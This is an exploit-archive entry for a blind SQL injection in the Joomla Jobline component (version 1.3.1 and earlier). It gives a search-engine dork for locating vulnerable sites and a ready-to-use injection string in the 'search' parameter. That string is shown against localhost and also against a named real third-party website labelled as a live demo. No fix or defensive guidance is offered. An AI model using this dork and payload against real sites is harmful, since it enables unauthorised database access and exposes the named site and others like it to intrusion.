Joomla Component Jobline <= 1.3.1 Blind SQL Injection Vulnerability

2009-07-17T00:00:00
ID 1337DAY-ID-5511
Type zdt
Reporter ManhLuat93
Modified 2009-07-17T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
Joomla Component Jobline <= 1.3.1 Blind SQL Injection Vulnerability
===================================================================


##################################################
# Joomla Component: Jobline <= 1.1.3.1 (search) / Blind SQL Injection Vulnerability
# Download: http://joomlacode.org/gf/download/frsrelease/3721/8325/jobline-1_1_2_2.zip
# Dork: inurl:"index.php?option=com_jobline"
#  ---> magic_quotes_gpc =Off
# ==================================
# {Author}: ManhLuat93
# {My HomePage}: http://manhluat.com/
##################################################

Live Demo: http://www.ntca.org/index.php?option=com_jobline&task=results&Itemid=&search=

[-] Exploit [+]

[--] http://localh0st/index.php?option=com_jobline&task=results&Itemid=&search=%' and substring(@@version,1,1)=5 and '%'='

[++] http://www.ntca.org/index.php?option=com_jobline&task=results&Itemid=&search=%' and substring(@@version,1,1)=5 and '%'='


note:
<name>Jobline</name>
<creationDate>08 Jan 2008</creationDate>
<version>1.3.1</version>
<joomlaVersion>1.5</joomlaVersion>
<copyright>(c) 2006 Olle Johansson</copyright>
<license>GNU GPL</license>



#  0day.today [2018-02-06]  #